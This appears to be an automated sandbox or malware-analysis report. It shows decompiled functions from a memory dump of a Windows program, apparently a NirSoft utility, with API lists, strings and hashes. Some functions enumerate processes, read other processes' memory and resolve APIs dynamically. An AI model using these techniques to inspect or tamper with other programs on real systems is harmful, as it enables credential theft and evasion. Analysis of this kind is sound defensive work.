Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C

Uniqueness

Uniqueness Score: -1.00%

Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

0x004090f5
0x00409171
0x00409171
0x004090fd
0x00409103
0x00409107
0x00409170
0x00000000
0x00409170
0x00409116
0x0040911a
0x0040911f
0x00409127
0x0040912b
0x00409130
0x00409138
0x0040913c
0x00409141
0x00409149
0x0040914d
0x00409152
0x0040915a
0x0040915e
0x00409163
0x00409165
0x00409165
0x00409163
0x00409152
0x00409141
0x00409130
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A

Strings

Process32Next, xrefs: 00409154
Module32First, xrefs: 00409121
Process32First, xrefs: 00409143
Module32Next, xrefs: 00409132
kernel32.dll, xrefs: 004090F8
CreateToolhelp32Snapshot, xrefs: 00409110

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

0x00409faf
0x00409fb4
0x00409fb5
0x00409fb6
0x0040a043
0x0040a04a
0x0040a058
0x0040a05f
0x0040a06d
0x0040a074
0x0040a08e
0x0040a099
0x0040a0ab
0x0040a0c9
0x0040a0ce
0x00000000
0x0040a0ce
0x00409fc3
0x00409fca
0x00409fd8
0x00409fdf
0x00409ff9
0x0040a006
0x0040a018
0x00000000

APIs

memset.MSVCRT ref: 00409FCA
memset.MSVCRT ref: 00409FDF
_snwprintf.MSVCRT ref: 00409FF9
_snwprintf.MSVCRT ref: 0040A018
memset.MSVCRT ref: 0040A04A
memset.MSVCRT ref: 0040A05F
memset.MSVCRT ref: 0040A074
_snwprintf.MSVCRT ref: 0040A08E
_snwprintf.MSVCRT ref: 0040A0AB

Strings

%%0.%df, xrefs: 00409FEC, 0040A081

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

0x00406216
0x0040621b
0x00406222
0x0040625f
0x00406263
0x00406269
0x00406271
0x00406273
0x00406289
0x00406289
0x0040628e
0x0040628f
0x004062a9
0x004062ab
0x004062ad
0x004062b0
0x004062c3
0x004062c3
0x004062d3
0x004062da
0x004062f1
0x004062f7
0x004062fe
0x0040630d
0x00406312
0x0040631e
0x00406327
0x00406275
0x00406283
0x00406283
0x00406285
0x00406287
0x00000000
0x00000000
0x00406277
0x0040627a
0x00406280
0x00406280
0x00000000
0x00406280
0x00000000
0x0040627a
0x00000000
0x00406283
0x00406273
0x00406224
0x00406224
0x00406229
0x0040622a
0x0040622f
0x00406236
0x0040623c
0x00406243
0x00406245
0x00406247
0x00406248
0x0040624b
0x00406254
0x00406254
0x0040632d
0x00406334

APIs

LoadMenuW.USER32 ref: 00406236

Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7

DestroyMenu.USER32(00000000), ref: 00406254
CreateDialogParamW.USER32 ref: 004062A9
GetDesktopWindow.USER32 ref: 004062B4
CreateDialogParamW.USER32 ref: 004062C1
memset.MSVCRT ref: 004062DA
GetWindowTextW.USER32 ref: 004062F1
EnumChildWindows.USER32 ref: 0040631E
DestroyWindow.USER32(00000005), ref: 00406327

Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2

Strings

caption, xrefs: 00406308

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

0x004081e4
0x004081ec
0x004081fc
0x00408200
0x00408215
0x0040821c
0x0040822a
0x00408231
0x0040823f
0x00408246
0x0040824b
0x0040824e
0x0040825a
0x0040825c
0x00408261
0x0040826c
0x0040826d
0x0040826e
0x00408273
0x00408273
0x00408276
0x0040827c
0x0040828a
0x00408290
0x004082ab
0x004082c5
0x004082c6
0x004082d1
0x004082d2
0x004082d3
0x004082e7
0x004082ec
0x004082f0
0x00000000
0x004082f5
0x004082fe

APIs

memset.MSVCRT ref: 0040821C
memset.MSVCRT ref: 00408231
memset.MSVCRT ref: 00408246
_snwprintf.MSVCRT ref: 0040826E
wcscpy.MSVCRT ref: 0040828A
_snwprintf.MSVCRT ref: 004082D3

Strings

<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
<table dir="rtl"><tr><td>, xrefs: 00408284
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

0x0040920a
0x00409218
0x00409223
0x0040922c
0x0040924b
0x00409253
0x0040929b
0x004092e4
0x0040929d
0x004092a3
0x004092b1
0x004092bd
0x004092cc
0x004092d1
0x004092d8
0x004092dd
0x00409255
0x0040925b
0x00409269
0x00409275
0x00409282
0x0040928d
0x00409292
0x004092ec
0x004092ef
0x004092ef
0x00409231
0x00409232
0x00409233
0x00000000
0x00409239
0x0040921a
0x00000000

APIs

wcschr.MSVCRT ref: 00409223
wcscpy.MSVCRT ref: 00409233

Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1

wcscpy.MSVCRT ref: 00409282
wcscat.MSVCRT ref: 0040928D
memset.MSVCRT ref: 00409269

Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E

memset.MSVCRT ref: 004092B1
memcpy.MSVCRT ref: 004092CC
wcscat.MSVCRT ref: 004092D8

Strings

\systemroot, xrefs: 00409240

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}

0x00409c73
0x00409c7c
0x00409c90
0x00409c9f
0x00409ca2
0x00409ca7
0x00409ca9
0x00409cb1
0x00409cc0
0x00409cc2
0x00409cc7
0x00409ccf
0x00409cd0
0x00409cd7
0x00409cd8
0x00409cd9
0x00409cda
0x00409cdc
0x00409ce0
0x00409ce1
0x00409ce9
0x00409cf1
0x00409cfb
0x00409d08
0x00409d08
0x00000000
0x00409d0d
0x00409d0f

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
strlen.MSVCRT ref: 00409CE4
strlen.MSVCRT ref: 00409CF1

Strings

GetProcAddress, xrefs: 00409C98, 00409C9D
LdrGetProcedureAddress, xrefs: 00409CBA
kernel32.dll, xrefs: 00409C8B
ntdll.dll, xrefs: 00409CB3

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcstrlen
String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
API String ID: 1027343248-2054640941
Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}

0x00401ac9
0x00401ad1
0x00401ae1
0x00401ae7
0x00401ae9
0x00401aec
0x00401c1b
0x00401af2
0x00401af2
0x00401af8
0x00401b0c
0x00401b1a
0x00401bfd
0x00401b20
0x00401b26
0x00401b2b
0x00401b36
0x00401b40
0x00401b43
0x00401b4a
0x00401b54
0x00401b55
0x00401b56
0x00401b57
0x00401b58
0x00401b63
0x00401b68
0x00401b69
0x00401b77
0x00401b7d
0x00401b82
0x00401b82
0x00401b88
0x00401b8b
0x00401b8e
0x00401b91
0x00401b98
0x00401b9b
0x00401ba0
0x00401ba5
0x00401baa
0x00401bac
0x00401bac
0x00401bb2
0x00401bb2
0x00401bbe
0x00401bc4
0x00401bc6
0x00401bc8
0x00401bc8
0x00401bd7
0x00401bee
0x00401bf0
0x00401bf0
0x00401c0e
0x00401c0e
0x00401c23

APIs

OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
memset.MSVCRT ref: 00401B4A
ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
_snwprintf.MSVCRT ref: 00401B69

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15

Strings

%d %I64x, xrefs: 00401B58

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765966058.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.765976929.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
String ID: %d %I64x
API String ID: 2567117392-2565891505
Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}

0x004045c2
0x004045d1
0x004045da
0x004045ef
0x004045f6
0x00404604
0x0040460b
0x00404610
0x00404616
0x00404617
0x00404618
0x00404628
0x00404629
0x0040462a
0x0040462f
0x00404630
0x00404631
0x0040463c
0x0040463d
0x0040463e
0x00404656
0x00404662
0x0040466b
0x0040466d
0x0040466e
0x00404674
0x00404679

APIs

memset.MSVCRT ref: 004045F6
memset.MSVCRT ref: 0040460B
_snwprintf.MSVCRT ref: 0040462A
_snwprintf.MSVCRT ref: 0040463E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404656
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404662
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?,?,00403904), ref: 0040466E

Strings

%s\shell\%s\command, xrefs: 00404618
%s\shell\%s, xrefs: 00404631

Memory Dump Source

Source File: 0000000A.00000002.765929772.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.765922665.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.765957619.000000000040C000.00000002.00020000.sdmp Download File
